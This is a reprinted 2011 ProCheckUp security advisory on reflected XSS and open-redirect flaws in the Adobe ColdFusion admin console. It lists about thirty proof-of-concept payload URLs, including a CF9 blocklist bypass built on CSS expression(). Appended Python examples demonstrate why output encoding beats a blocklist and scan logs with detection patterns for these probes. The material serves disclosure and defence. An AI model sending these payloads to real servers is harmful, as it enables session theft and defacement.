Adobe ColdFusion Cross Site Scripting

16 Mar 2011 00:00:00 | Reported by ProCheckUp | Type: packetstorm | Source: packetstormsecurity.com

Adobe ColdFusion admin console XSS vulnerability found and fixed

Code
`http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-08  
  
  
PR10-08: Various XSS and information disclosure flaws within Adobe  
ColdFusion administration console  
Vulnerability found: 17th April 2010  
  
Vendor informed: 19th April 2010  
  
Vulnerability fixed: 8th February 2011  
  
Severity: Medium/High  
  
Description:  
Adobe ColdFusion is an easy-to-use and very widely adopted programming  
language. ProCheckUp has discovered that the ColdFusion admin console  
(and various programs within it) is vulnerable to reflected XSS attacks.  
The admin console is normally accessed using a web browser over port  
8500 (though this can be changed), or is mapped directly onto a web server  
directory by proxying the .cfm extension to ColdFusion.  
Note: Tested on ColdFusion Enterprise 8.0.1 running on Windows XP, and on  
ColdFusion 7, 8 and 9 running on Windows Server 2003 R2 SP2 mapped to  
IIS 6.  
Defaults were chosen with the "server contained installation" and all  
subcomponents.  
Versions tested:  
ColdFusion MX7 7,0,0,91690 base patches  
ColdFusion MX8 8,0,1,195765 base patches  
ColdFusion MX8 8,0,1,195765 with Hotfix 4  
ColdFusion MX8 8,0,1,195765 with Hotfix 4 and the patches from security  
bulletin APSB10-11 (shf8010001.jar and CFIDE-801.zip)  
ColdFusion 9 9,0,0,251028 base patches  
ColdFusion 9 9,0,0,251028 with Hotfix 1  
(ColdFusion 9 includes a simple list of forbidden tags, so <script> cannot  
be used; see the CF9 variants below.)  
The following demonstrate the XSS flaws:  
  
1) Unauthenticated vanilla XSS - ColdFusion 7 and ColdFusion 8. IE7  
browser used.  
http://target-domain.foo:8500/CFIDE/administrator/archives/index.cfm?browsesubmit=Browse+Server&mapping=&5921a"><script>alert(1)</script>3081b18fb95=1  
  
Does not work with ColdFusion 7:  
http://target-domain.foo:8500/CFIDE/administrator/datasources/derbyEmbedded.cfm?dsn=cfartgallery&"><script>alert(1)</script>=1  
  
http://target-domain.foo:8500/CFIDE/administrator/extensions/corbaedit.cfm?"><script>alert(1)</script>  
  
http://target-domain.foo:8500/CFIDE/administrator/logviewer/searchlog.cfm?logfile="><script>alert(1)</script>  
  
http://target-domain.foo:8500/CFIDE/administrator/settings/[email protected]&browsesubmit=Browse+Server&mapping=&5921a"><script>alert(1)</script>3081b18fb95=1  
  
http://target-domain.foo:8500/CFIDE/administrator/settings/fonts.cfm?browsesubmit=Browse+Server&mapping=&5921a"><script>alert(1)</script>3081b18fb95=1  
  
http://target-domain.foo:8500/CFIDE/administrator/settings/jvm.cfm?browsesubmit=Browse+Server&jvmArgs=-server+-Dsun.io.useCanonCaches%3dfalse+-XX%3aMaxPermSize%3d192m+-XX%3a%2bUseParallelGC+-Dcoldfusion.rootDir%3d%7bapplication.home%7d%2f..%2f+-Dcoldfusion.libPath%3d%7bapplication.home%7d%2f..%2flib&jdkPath=C%3a%2fColdFusion8%2fruntime%2fjre&minHeap=0&maxHeap=512&12bf2"><script>alert(1)</script>1fb5988b6d1  
  
http://target-domain.foo:8500/CFIDE/administrator/settings/mappings.cfm?browsesubmit=Browse+Server&mapping=&5921a"><script>alert(1)</script>3081b18fb95=1  
  
http://target-domain.foo:8500/CFIDE/administrator/settings/version.cfm?browsesubmit=Browse+Server&mapping=&5921a"><script>alert(1)</script>3081b18fb95=1  
  
Works intermittently, or with a delayed response:  
http://target-domain.foo:8500/CFIDE/administrator/analyzer/index.cfm?browsesubmit=Browse+Server&directory=C%3a%5cColdFusion8%5cwwwroot%5cCFIDE%5cadministrator%5canalyzerd590f"style%3d"x:expression(alert(1))"  
  
2) ColdFusion 9 variants - these work with CF9 because they do not use  
the <script> tag.  
To circumvent the forbidden-tag list, <script>alert(1)</script> is  
substituted with a tag that is not on the match list:  
</XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>  
(this works on IE7 and IE6, the versions that evaluate CSS expression())  
  
http://target-domain.foo/CFIDE/administrator/archives/index.cfm?browsesubmit=Browse+Server&mapping=&5921a"></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>3081b18fb95=1  
  
http://target-domain.foo/CFIDE/administrator/datasources/derbyEmbedded.cfm?dsn=cfartgallery&"></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>=1  
  
http://target-domain.foo/CFIDE/administrator/extensions/corbaedit.cfm?"></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>  
  
http://target-domain.foo/CFIDE/administrator/logviewer/searchlog.cfm?logfile="></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>  
  
http://target-domain.foo/CFIDE/administrator/settings/[email protected]&browsesubmit=Browse+Server&mapping=&5921a"></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>  
  
http://target-domain.foo/CFIDE/administrator/settings/fonts.cfm?browsesubmit=Browse+Server&mapping=&5921a"></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>  
  
http://target-domain.foo/CFIDE/administrator/settings/jvm.cfm?browsesubmit=Browse+Server&jvmArgs=-server+-Dsun.io.useCanonCaches%3dfalse+-XX%3aMaxPermSize%3d192m+-XX%3a%2bUseParallelGC+-Dcoldfusion.rootDir%3d%7bapplication.home%7d%2f..%2f+-Dcoldfusion.libPath%3d%7bapplication.home%7d%2f..%2flib&jdkPath=C%3a%2fColdFusion8%2fruntime%2fjre&minHeap=0&maxHeap=512&12bf2"></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>1  
  
http://target-domain.foo/CFIDE/administrator/settings/mappings.cfm?browsesubmit=Browse+Server&mapping=&5921a"></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>3081b18fb95=1  
  
http://target-domain.foo/CFIDE/administrator/settings/version.cfm?browsesubmit=Browse+Server&mapping=&5921a"></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>3081b18fb95=1  
  
3) Authenticated vanilla XSS attacks.  
IE7 and Firefox, authenticated:  
http://target-domain.foo:8500/CFIDE/administrator/extensions/appletedit.cfm?method=1&code=1&width=1&applet=1"><script>alert(1)</script>5d59011273e  
IE7, authenticated:  
http://target-domain.foo:8500/CFIDE/administrator/extensions/cfx_cppedit.cfm?PROCEDURE=ProcessTagRequestbaccd%22style%3d%22x:expression%28alert%281%29%29%221dcd653666d&TAGNAME=cfx_&CACHE=on&TreeSubmitApply=true  
  
IE7, authenticated (does not work with ColdFusion 7):  
http://target-domain.foo:8500/CFIDE/administrator/eventgateway/gatewaytypes.cfm?typename=ActiveMQca235"style%3d"x:expression(alert(1))"6de21ab4628&action=edit  
  
Takes a while to come back, authenticated:  
http://target-domain.foo:8500/CFIDE/administrator/settings/clientvariables.cfm?action=edit&store=Registrydb5a1"style%3d"x:expression(alert(1))"8d51e21067f  
  
  
ColdFusion 9 variants of the authenticated attacks - as above, the  
<script> tag is substituted with a tag that is not on the match list:  
</XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>  
(this works on IE7 and IE6)  
  
http://target-domain.foo/CFIDE/administrator/extensions/appletedit.cfm?method=1&code=1&width=1&applet=1"></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>5d59011273e  
  
http://target-domain.foo/CFIDE/administrator/extensions/cfx_cppedit.cfm?PROCEDURE=ProcessTagRequestbaccd%22style%3d%22x:expression%28alert%281%29%29%221dcd653666d&TAGNAME=cfx_&CACHE=on&TreeSubmitApply=true  
  
http://target-domain.foo/CFIDE/administrator/eventgateway/gatewaytypes.cfm?typename=ActiveMQca235"style%3d"x:expression(alert(1))"6de21ab4628&action=edit  
  
Takes a while to come back:  
http://target-domain.foo/CFIDE/administrator/settings/clientvariables.cfm?action=edit&store=Registrydb5a1"style%3d"x:expression(alert(1))"8d51e21067f  
  
4) Authenticated vanilla XSS, fixed in ColdFusion 8 Hotfix 4 (works with  
ColdFusion 7 and with ColdFusion 8 prior to Hotfix 4).  
  
http://target-domain.foo:8500/CFIDE/administrator/datasources/index.cfm?locale=enb6f5d"style%3d"x:expression(alert(1))"24ac5d7bc65&VerifyAllDatasources=+Verify+All+Connections+  
http://target-domain.foo:8500/CFIDE/administrator/eventgateway/gateways.cfm?gwid=SMS%20Menu%20App%20%2D%20555121268668"style%3d"x:expression(alert(1))"886b9fc22e4&action=edit  
  
http://target-domain.foo:8500/CFIDE/administrator/j2eepackaging/editarchive.cfm?locale=en579a7"style%3d"x:expression(alert(1))"df5c8bdd5e9&addarchive=%a0+Add+%a0&archivename=Test+Me  
  
Takes a while to come back:  
http://target-domain.foo:8500/CFIDE/administrator/settings/charting.cfm?browsesubmit=Browse+Server&CachePath=C%3a%5cJRun4%5cservers%5ccfusion%5ccfusion-ear%5ccfusion-war%5cWEB-INF%5ccfusion%5ccharting%5ccachef2250"style%3d"x:expression(alert(1))"7d1c33c9139&maxEngines=4&cacheSize=50&cacheType=1  
  
  
  
Consequences:  
  
An attacker may be able to cause execution of malicious scripting code  
in the browser of a user who clicks on a link to an exposed ColdFusion  
admin site. Such code would run within the security context of the  
target domain. This type of attack can result in non-persistent  
defacement of the target site, or the redirection of confidential  
information (e.g. session IDs) to unauthorised third parties.  
  
  
  
Fix:  
Apply patch as described in Adobe bulletin apsb11-04  
http://www.adobe.com/support/security/bulletins/apsb11-04.html  
  
  
  
5) Open redirection - fixed in ColdFusion 8 Hotfix 4  
http://target-domain.foo:8500/CFIDE/administrator/logging/archiveexecute.cfm?logfile=application%2Elog&return=true  
Set the Referer header on the request, e.g.:  
Referer: http://www.procheckup.com  
  
References:  
http://www.procheckup.com/Vulnerabilities.php  
http://www.adobe.com/support/security/bulletins/apsb11-04.html  
http://www.securityfocus.com/bid/46273  
  
  
Credits: Richard Brain of ProCheckUp Ltd (www.procheckup.com)  
  
  
Legal:  
  
Copyright 2010 Procheckup Ltd. All rights reserved.  
  
Permission is granted for copying and circulating this Bulletin to the  
Internet community for the purpose of alerting them to problems, if and  
only if, the Bulletin is not edited or changed in any way, is attributed  
to Procheckup, and provided such reproduction and/or distribution is  
performed for non-commercial purposes.  
  
Any other use of this information is prohibited. Procheckup is not  
liable for any misuse of this information by any third party.  
  
`
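The ColdFusion 9 forbidden-tag list described in the advisory is a blocklist, and the `</XSS/*-*/STYLE=xss:e/**/xpression(...)>` payload shows why a blocklist is not a fix for reflected XSS inside an HTML attribute. The following Python script is an added example and is not ProCheckUp's or Adobe's code: it puts a CF9-style forbidden-tag filter in front of a form field that reflects the `mapping` parameter (the tag list beyond `<script>` and the `<input>` template are assumptions made for the example) and uses Python's own HTML parser to check whether the untrusted value is still entirely inside the attribute after rendering. The blocklist stops the vanilla `<script>` payload but lets the CF9 variant close the attribute; HTML-attribute encoding on output keeps both payloads inert without any blocklist.

```python
"""Added example (not ProCheckUp's or Adobe's code): why a forbidden-tag
list does not stop reflected XSS in an HTML attribute, but output
encoding does.

Assumptions: FORBIDDEN_TAGS is a stand-in for ColdFusion 9's list (the
advisory only says that <script> is on it), and the <input> template is a
constructed stand-in for the admin-console form field that reflects the
"mapping" parameter.
"""
import html
import re
from html.parser import HTMLParser
from typing import Optional

# Assumed blocklist; the advisory confirms only that <script> is forbidden.
FORBIDDEN_TAGS = ("script", "iframe", "object", "embed")
_FORBIDDEN_RE = re.compile(
    r"<\s*/?\s*(?:" + "|".join(FORBIDDEN_TAGS) + r")\b", re.IGNORECASE
)

# Two payloads taken from the advisory: the vanilla one and the CF9 variant.
PAYLOAD_SCRIPT = '"><script>alert(1)</script>'
PAYLOAD_CF9 = ('"></XSS/*-*/STYLE=xss:e/**/xpression('
               'window.location="http://www.procheckup.com/")>')


def blocklist_allows(value: str) -> bool:
    """CF9-style check: reject only if a forbidden tag name appears."""
    return _FORBIDDEN_RE.search(value) is None


def render_unencoded(value: str, use_blocklist: bool = True) -> Optional[str]:
    """The vulnerable pattern: the parameter is written into an attribute
    as-is once it has passed the blocklist.  None means it was rejected."""
    if use_blocklist and not blocklist_allows(value):
        return None
    return f'<input type="text" name="mapping" value="{value}">'


def render_encoded(value: str) -> str:
    """The fix: HTML-attribute-encode on output (quote=True also encodes ").
    No blocklist is needed; the value can never close the attribute."""
    escaped = html.escape(value, quote=True)
    return f'<input type="text" name="mapping" value="{escaped}">'


class _FirstInputValue(HTMLParser):
    """Records the (entity-decoded) value attribute of the first <input>."""

    def __init__(self) -> None:
        super().__init__()
        self.value: Optional[str] = None

    def handle_starttag(self, tag, attrs):
        if tag == "input" and self.value is None:
            self.value = dict(attrs).get("value")


def attribute_intact(rendered: Optional[str], original: str) -> bool:
    """True when a browser-style parse still sees the whole untrusted value
    inside the value attribute, i.e. nothing escaped the attribute context.
    A rejected (None) rendering counts as not intact: the request was
    blocked rather than rendered safely."""
    if rendered is None:
        return False
    parser = _FirstInputValue()
    parser.feed(rendered)
    parser.close()
    return parser.value == original


if __name__ == "__main__":
    for name, payload in (("vanilla", PAYLOAD_SCRIPT), ("cf9", PAYLOAD_CF9)):
        print(f"{name}: blocklist allows={blocklist_allows(payload)}, "
              f"unencoded intact={attribute_intact(render_unencoded(payload), payload)}, "
              f"encoded intact={attribute_intact(render_encoded(payload), payload)}")
```

Run it directly to see both rows: the CF9 payload passes the blocklist and breaks out of the unencoded attribute, while the encoded rendering keeps every payload inside the attribute. The check deliberately parses the rendered markup rather than grepping for `<script`, because the bug is a context break (an unescaped `"`), not the presence of any particular tag name.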
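Detection for the probe URLs and the Referer-driven open redirection listed in the advisory, as an added Python example that is not part of the ProCheckUp advisory: it parses constructed IIS W3C log lines (the hostname target-domain.foo, times and status codes are made up for the example), URL-decodes the query string once, strips the CSS comments that split `e/**/xpression`, and flags admin-console requests that carry the advisory's indicators, plus `archiveexecute.cfm?return=true` requests whose Referer points off-site. The indicator list and the OWN_HOSTS set are assumptions for the example, not rules shipped with ColdFusion or IIS.

```python
"""Added example (not part of the ProCheckUp advisory): flag requests for
the admin-console probes listed in the advisory in an IIS W3C log.

The log below is constructed for this example (times, server name and
status codes are made up); its field layout follows IIS's W3C extended
format, with '-' for an empty field and '+' for a space.  The query string
is logged URL-encoded as sent, so it is decoded once before matching, and
CSS comments are stripped so that "e/**/xpression(" is seen as
"expression(".
"""
import re
from urllib.parse import unquote_plus, urlsplit

ADMIN_PREFIX = "/cfide/administrator/"
OWN_HOSTS = {"target-domain.foo"}  # assumed hostname of the ColdFusion server

# Constructed sample log: two clean requests and four of the advisory's probes.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query cs(Referer) sc-status
2010-04-17 10:01:02 GET /CFIDE/administrator/index.cfm - - 200
2010-04-17 10:01:09 GET /CFIDE/administrator/settings/mappings.cfm browsesubmit=Browse+Server&mapping=&5921a%22%3E%3Cscript%3Ealert(1)%3C/script%3E3081b18fb95=1 - 200
2010-04-17 10:01:15 GET /CFIDE/administrator/extensions/cfx_cppedit.cfm PROCEDURE=ProcessTagRequestbaccd%22style%3d%22x:expression%28alert%281%29%29%221dcd653666d&TAGNAME=cfx_&CACHE=on&TreeSubmitApply=true - 200
2010-04-17 10:01:21 GET /CFIDE/administrator/archives/index.cfm browsesubmit=Browse+Server&mapping=&5921a%22%3E%3C/XSS/*-*/STYLE=xss:e/**/xpression(window.location=%22http://www.procheckup.com/%22)%3E3081b18fb95=1 - 200
2010-04-17 10:01:30 GET /CFIDE/administrator/logging/archiveexecute.cfm logfile=application%2Elog&return=true http://www.procheckup.com/ 302
2010-04-17 10:02:00 GET /index.cfm id=42 - 200
"""

# Indicators derived from the advisory's payloads, matched after decoding.
XSS_INDICATORS = {
    "script-tag": re.compile(r"<\s*/?\s*script\b", re.IGNORECASE),
    "css-expression": re.compile(r"\bexpression\s*\(", re.IGNORECASE),
    "attr-breakout": re.compile(r"""["']\s*(?:>|style\s*=)""", re.IGNORECASE),
}
_CSS_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)


def normalize_query(raw_query: str) -> str:
    """Decode the logged query once (the probes are encoded once) and strip
    CSS comments used to split keywords such as e/**/xpression."""
    if raw_query == "-":
        return ""
    return _CSS_COMMENT.sub("", unquote_plus(raw_query))


def parse_w3c(text: str):
    """Yield one dict per record, using the #Fields header for column names.
    Records whose column count does not match are skipped, not guessed at."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            parts = line.split(" ")
            if fields and len(parts) == len(fields):
                yield dict(zip(fields, parts))


def classify(record: dict, own_hosts=OWN_HOSTS) -> list:
    """Return the indicator names that fire for one admin-console record."""
    stem = record["cs-uri-stem"].lower()
    if not stem.startswith(ADMIN_PREFIX):
        return []
    query = normalize_query(record["cs-uri-query"])
    reasons = [name for name, rx in XSS_INDICATORS.items() if rx.search(query)]
    # Open redirection in archiveexecute.cfm: return=true plus an off-site Referer.
    referer = record.get("cs(Referer)", "-")
    if (stem.endswith("/logging/archiveexecute.cfm")
            and "return=true" in query and referer != "-"):
        host = urlsplit(referer).hostname
        if host and host.lower() not in own_hosts:
            reasons.append("external-referer-open-redirect")
    return reasons


def scan_log(text: str, own_hosts=OWN_HOSTS) -> list:
    """Return [{'time', 'stem', 'reasons'}] for every record that fires."""
    findings = []
    for rec in parse_w3c(text):
        reasons = classify(rec, own_hosts)
        if reasons:
            findings.append({"time": rec["time"], "stem": rec["cs-uri-stem"],
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["stem"], ",".join(f["reasons"]))
```

Two design choices matter in practice: decode exactly as many times as the server would (once here; a double decode would also fire on benign double-encoded data), and normalise away the `/**/` comment trick before keyword matching, since the CF9 variant never contains the literal string `expression(`.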
